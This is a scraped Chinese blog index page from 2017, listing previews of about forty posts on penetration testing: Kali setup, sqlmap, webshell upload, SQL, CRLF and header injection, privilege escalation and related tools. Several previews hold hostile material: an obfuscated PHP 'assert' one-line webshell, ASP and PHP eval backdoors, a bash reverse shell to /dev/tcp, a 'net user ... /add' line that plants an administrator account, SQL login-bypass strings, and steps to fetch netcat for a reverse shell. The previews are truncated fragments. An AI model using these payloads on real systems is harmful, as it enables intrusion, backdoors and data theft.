- 博客(50)
- 收藏
- 关注
转载 python27+Sqlmap安装详解
Step1. Python2.7.11下载: 下载地址:https://www.python.org/downloads/ Step2. Python2.7.11安装:2.1. 直接双击下载好的Python2.7.11安装包,默认,Next;2.2. 默认,Next;2.3. 将“Ad
2017-08-31 19:24:07 5318 2
转载 Pycharm安装详解
1、首先从网站下载pycharm:点击打开链接(链接为:http://www.jetbrains.com/pycharm/download/#section=windows),进入之后如下图,根据自己电脑的操作系统进行选择,对于windows系统选择图中红色圈中的区域。2、下载完成之后如下图:3、直接双击下载好的exe文件进行安装,安
2017-08-31 18:42:59 552
转载 python安装详解
1、首先进入网站下载:点击打开链接(或自己输入网址https://www.python.org/downloads/),进入之后如下图,选择图中红色圈中区域进行下载。2、下载完成后如下图所示3、双击exe文件进行安装,如下图,并按照圈中区域进行设置,切记要勾选打钩的框,然后再点击Customize inst
2017-08-31 18:31:03 373
转载 Kali安装中文输入法
下载搜狗输入法linux版:http://pinyin.sogou.com/linux/?r=pinyin 选择 64 位版本 在弹出的对话框中选择“Save File” 查看下载文件 确认下载完成后进入安装环节。输入法需要用到 fcitx,所以需要先安装apt-get install fcitx fcitx-config-gtk211进入
2017-08-31 17:20:33 916
转载 Kali 安装详细步骤
安装虚拟机打开 VMware Workstation ,选择“创建新的虚拟机” 选择“自定义”安装模式 选择“linux”和“Bebian 8.x 64位” 填写虚拟机名称,可以根据自己情况填写,位置选择一个容量大速度快的盘符和位置,并且为 Kali 虚拟机单独建个文件夹,之后好管理。 根据自己电脑情况分配 CPU 数量,我的
2017-08-31 17:14:32 1190
转载 Kali 2017更新源
一、添加更新源leafpad /etc/apt/sources.list 二、国内更新源#autodeb http://http.kali.org/kali kali-rolling main non-free contrib#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-fre
2017-08-31 17:12:30 7593
转载 kali2017安装 VMware Tools
依次选择“虚拟机(M)—— 安装 VMware Tools”, 加载完成后,复制 VMware Tools-10.0.10***.tar.gz (不同版本具体名字不同)到 home 目录 tools 文件夹(tools文件夹需要手动创建), 解压:tar -xzvf VMware Tools ***.tar.gz,VMware Tools ***.tar.gz 根据自己文件内容要换成具
2017-08-31 17:02:49 3043
转载 phpmyadmin+Notepad++
phpMyAdmin 就是一种 MySQL 数据库的管理工具,安装该工具后,即可以通过 web 形式直接管理 MySQL 数据,而不需要通过执行系统命令来管理,非常适合对数据库操作命令不熟悉的数据库管理者。下载百度搜索下载 phpMyAdmin,也可以到 phpMyAdmin 官方网站下载,再解压到 web 可以访问的目录下,如果是虚拟空间,可以
2017-08-30 16:18:47 404
原创 一句话木马,小马,大马,混淆一句话木马
php @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r'; @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t'; @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}
2017-08-30 14:21:33 8292
原创 信息收集
DNS记录分析:(dig,fierce)信息收集工具:discover,recon-ng,maltego端口扫描工具:nmap主机扫描工具:nessus,opnevas,nexposeweb应用扫描:AWVS,burpsuite
2017-08-30 11:01:49 410
转载 攻防实战:使用Lcx进行内网端口转发
在理论上只要网络连接的计算机都是可以访问的,但是在实际中往往由于技术水平等原因,很难实现它;例如局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务,这必须进行端口映射等操作才行。端口映射在入侵内网的时候经常用到,特别是要登陆远程终端服务时,使用端口映射就非常方便。 Lcx.exe是一个端口转
2017-08-29 21:14:00 3890
转载 hackbar黑客插件
首先安装“火狐浏览器”,自己去百度搜索并安装即可。安装完后,打开火狐浏览器,在工具=》附加组件里搜索“HackBar”并安装,如下图:安装完后,重启一下火狐浏览器才会生效,如下图:重启完后,打开百度,你会发现标签栏处多了一些工具条,它就是HackBar插件,首次打开是开启的,可以通过
2017-08-27 20:56:57 8445
转载 Linux环境下netcat使用
Linux提权绝大部分都靠的是Local Exploit。WebShell一般都可以执行命令,但是溢出必须在可交互环境运行,否则如果直接在WebShell执行,即使能溢出提权成功,也没法利用。因此必须要反弹一个Shell命令行窗口,在命令行终端下执行溢出进行提权。主要步骤:1、wget一个tar压缩的ncWget http://sourceforge.net/projects/netc
2017-08-27 10:26:05 1215
转载 如何配置Tomcat服务器环境
工具/原料1,JDK:版本为jdk-7-windows-i586.exe 下载地址http://www.oracle.com/technetwork/java/javase/downloads/index.html2,tomcat:版本为apache-tomcat-7.0.33-windows-x86.zip 下载地址http://tomcat.
2017-08-26 11:36:47 375
原创 ASP基础
ASP简介:1.ASP 是什么?ASP 代表 Active Server Pages (动态服务器页面)ASP 是一项微软公司的技术ASP 是在 IIS 中运行的程序IIS 代表 Internet Information Services (Internet 信息服务)2.ASP 文件是什么?ASP 文件与 HTML 文件类似ASP 文件
2017-08-24 21:28:41 698
转载 win7下IIS的安装和配置 图文教程
一、首先是安装IIS。打开控制面板,找到“程序与功能”,点进去二、点击左侧“打开或关闭Windows功能”三、找到“Internet 信息服务”,按照下图打勾即可等待安装完成四、安装完成后,再回到控制面板里面,找到“管理工具”,点进入五、双击“Internet 信息服务(IIS)管理器”就是IIS了。如果经常需要使用IIS的朋友,建议鼠标指到“Interne
2017-08-24 21:13:44 249
原创 php中HTTP_X_FORWARDED_FOR 和 REMOTE_ADDR
1.REMOTE_ADDR:浏览当前页面的用户计算机的ip地址2.HTTP_X_FORWARDED_FOR: 浏览当前页面的用户计算机的网关3.HTTP_CLIENT_IP:客户端的ip在PHP 中使用 $_SERVER["REMOTE_ADDR"] 来取得客户端的 IP 地址,但如果客户端是使用代理服务器来访问,那取到的就是代理服务器的 IP 地址,而不是真正的客户端 IP 地址
2017-08-23 17:12:40 980
原创 Exploit-db漏洞库
访问的方法是在命令提示符中输入一下命令:cd /pentest/exploits/exploitdb/cat files.csv | lessBT5下的更新脚本#!/bin/bashecho "Updating The Exploit-DB"cd /pentest/exploits/exploitdb/wget http://www.expl
2017-08-22 20:02:19 9116
原创 Struct2命令执行漏洞
Struct2漏洞产生原因:1.Apache Struts2的“Dynamic Method Invocation”机制是默认开启的,仅提醒用户如果可能的情况下关闭此机制,如果未关闭此机制将导致远程代码执行漏洞,远程攻击者可利用此漏洞在受影响应用上下文中执行任意代码。2.Apache Struts2在实现过程中使用了OGNL表达式,并将用户通过URL提交的内容拼接入OGNL表达式中,当de
2017-08-22 15:50:59 1545
原创 一句话反弹shell
1.Bash:•bash–i >&/dev/tcp/10.0.0.1/80800>&1 //bash –i打开一个交互的bash, /dev/tcp建立一个socket连接, >&将标准错误输出重定向到标准输出中,0>&1将标准输入重定向到标准输出中。•Linuxshell文件描述符:•1.标准输入:代码为0,使用•2.标准输出:代码为1,使用>或>>;•3.标准错误输出:
2017-08-21 21:11:07 4560 1
原创 HTTP头注入漏洞之SQL注入
输入参数主要覆盖范围有:HTTP 查询字符参数(GET):输入参数通过URL发送HTTP 正文参数(POST):输入参数通过HTTP正文发送HTTP Cookie参数:输入参数通过HTTP cookie发送HTTP Headers:HTTP提交应用程序使用的头,包括User-agent和Referer头字段1.Cookie头字段首部字段Cookie会
2017-08-21 16:33:06 2814
原创 CRLF注入漏洞
CRLF是“回车+换行”(\r\n)的简称,其十六进制编码分别为0x0d和0x0a。在HTTP协议中,HTTP header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP内容并显示出来。所以,一旦我们能够控制HTTP消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话Cookie或者HTML代码。1.通过CRLF注入构造会话固定漏洞请求参数:
2017-08-21 14:40:51 11592
原创 利用动网论坛dvBBS漏洞上传webshell
动网论坛一直是国内比较受欢迎的ASP论坛程序下载数据库查看DV_upfile数据表,搜索F_ID字段得到php文件地址(前提是知道数据库地址,并且可下载,一般数据库默认地址为/data/dvbbs8.mdb)1. 通过注入点获得网站的后台账号和密码,但没有找到后台登录地址2. 下载动网论坛数据库,一般默认地址是/data/dvbbs8.mdb3. 读取
2017-08-20 21:14:06 4313
原创 Apache中的.htaccess文件
Apache中的.htaccess文件是Apache的一个配置文件,其格式为纯文本。通过.htaccess文件可以实现:URL重写,自定义错误页面,MIME类型配置以及访问权限控制等。主要体现在伪静态的的应用,图片防盗链,自定义404错误页面,禁止访问指定文件类型,文件密码保护等通过.htaccess防盗链RewriteEngine onRewriteCond%{HTTP_REFERE
2017-08-20 20:25:00 621
原创 webshell一句话木马
asp一句话木马%>"" Then execute(request("sb"))%>补充知识:asp代码执行漏洞:Eval函数接受一个包含VBScript表达式的字符串php一句话木马 //容错代码@eval($_POST[sb]) //绕过
2017-08-18 21:47:06 3064 1
原创 SQL注入之万能密码
万能密码形式:'or'='or' 例如:select * from table where username='' or '=' or '' and password=''; //and优先于or,且'='为真类似形式还有:"or"a"="a ')or('a'='a")or("a"="a'or 1=1--"or 1=1--'or"='‘or’='or
2017-08-18 20:29:40 10549 1
原创 MySQL扩展接口UDF提权
一、MySQL自定义函数UDF提权1.UDF介绍udf(user-defined function)是MySQL的一个拓展接口,也称为自定义函数。2. UDF提权条件1)目标系统是Windows(win2000,XP,win2003)2)可以将udf.dll写入到相应目录的权限。(如果Mysql版本大于5.1版本,udf.dll文件必须放置于MySQL安装目录下的lib\plu
2017-08-18 17:00:11 1557
原创 基于webshell提权
1.Server-u提权通过webshell读取server-u配置文件,修改配置,添加系统用户1,利用webshell读取服务器信息,发现服务器系统安装server-u服务,默认端口号439582.创建用户账户:cmd /c net user aaa 123 /add & net localgroup administrators aaa /add3.利用远程桌面连接server
2017-08-18 15:32:14 2931
原创 MySQL的字符格式
MySQL的字符格式一般分为两类:1.__2._bin比如最常用的utf8_general_ci,就是第一种格式ci是case insensitive(大小写不敏感)的缩写,cs是case sensitive(大小写敏感)的缩写bin指的是按照二进制的方式比较,这种情况不存在大小写的问题
2017-08-17 20:58:58 630
原创 业务逻辑漏洞
一、等于与存在判断绕过1.in_array()函数in_array()函数用来判断一个值是否在某一个数组列表里面payload: $sql="select ...where typeid="'".$_GET['a']."'"; echo $sql;}请求1.php?a=1' union select ...%232.is_numeric()函数is
2017-08-17 16:39:08 2455
原创 变量覆盖漏洞
变量覆盖指的是可以用我们自定义的参数值替换程序原有的变量值经常引发变量覆盖漏洞的函数有:extract(),parse_str()和import_request_variables()函数一、使用函数不当1.extract()函数该函数有三种情况会覆盖掉已有变量:第一种情况是第二个参数为EXTR_OVERWRITE, 表示如果有冲突,则覆盖已有的变量。第二种情况是只传入第一
2017-08-17 15:22:28 3267
原创 文件上传漏洞
1.未过滤或本地过滤未过滤和本地过滤的共同点是在服务器端都未过滤,这里的未过滤是指没有限制任何格式的文件上传,就是一个简单的文件上传功能。2.黑名单扩展名过滤黑名单的缺点:1)限制的扩展名不够齐全,上传文件格式不可预测性导致了可能会有漏网之鱼例如:$savefile=preg_replace('/(php|phtml|php3|php4|jsp|exe|dll|asp|ce
2017-08-17 10:50:41 514
原创 PHP文件包含漏洞
PHP的文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。文件包含分为本地文本包含(local file include)和远程文件包含(remote file include)文件包含函数有:include(),include_once(),require()和require_once()1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和ca
2017-08-17 09:34:53 1324
原创 OS命令执行漏洞
代码执行漏洞指的是可以执行PHP脚本代码,而命令执行漏洞指的是可以执行系统命令或应用指令(如cmd命令或bash命令)的漏洞php命令执行漏洞主要是一些函数的参数过滤不严格所导致,可以执行OS命令的函数一共有7个:system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()另外,反单引号(`)也
2017-08-16 21:29:34 2308
原创 PHP代码执行漏洞
代码执行漏洞是指应用程序本身过滤不严,攻击者可以通过请求将代码注入到应用中,最终在web服务器上去执行。危险函数执行PHP代码的有:eval(), assert(), preg_replace(), call_user_func(), call_user_func_array(), create_function(), array_map()等。1.eval()和assert()函数本
2017-08-16 21:21:25 2917 1
原创 MSSQL注入之木马上传拿webshell
1.检测是否存在注入点:依次添加语句',and 1=1和and 1=2,来判断网站是否存在注入点2.利用语句:a' having 1=1--爆出表名和字段名AdminUser.AdminId3.接着爆出其他字段:a' group by adminuser.adminid having 1=1-- //爆出用户名字段a' group by adminuser.adminid,adm
2017-08-16 16:30:51 4401
原创 webshell上传技术
中国菜刀连接一句话木马1.上传一句话木马,记录木马地址:http://192.168.1.3:8080/up/images/lubr.php 一句话木马:asp的一句话是: php的一句话是:2.菜刀连接进入中国菜刀目录,点击chopper.exe右键点击添加,在地址栏中添加上传文件路径,右侧添加密码lubr, 脚本类型为PHP右键点击文件管理,查看目标服务器的完整目
2017-08-16 16:15:49 15672
原创 明小子注入工具+啊D注入工具+御剑后台扫描工具+中国菜刀一句话木马
御剑:御剑主要用来扫描目标站点的敏感目录,如后台管理页面,cms类型以及版本等使用:1.输入目标站点的url,点击扫描2.扫描结果分析:HTTP响应值为200,代表页面可以访问双击链接http://../index.asp,进入目标站点主页双击链接http://../admin/login.asp, 进入后台管理页面双击链接http://../FCKeditor/_
2017-08-16 11:04:08 90964 22
原创 ASP+Access注入
查询数据库类型:内置变量查询数据库类型:and user>0内置数据表查询数据库类型:and (select count(*) from sysobjects)>=0and (select count(*) from msysobjects)>=0猜表名:and exists (select * from 表名)and (select count(*) from 表
2017-08-15 20:49:35 615
原创 ASPX+MSSQL注入
MSSQL注入点的基本检查1.类型的判断2.权限的判断3.返回信息的判断利用扩展存储注入攻击MSSQL注入点的基本检查:注入点类型的判断:and exists (select * from sysobjects)注入点权限的判断:and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员and 1=(sele
2017-08-15 19:07:17 6415
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人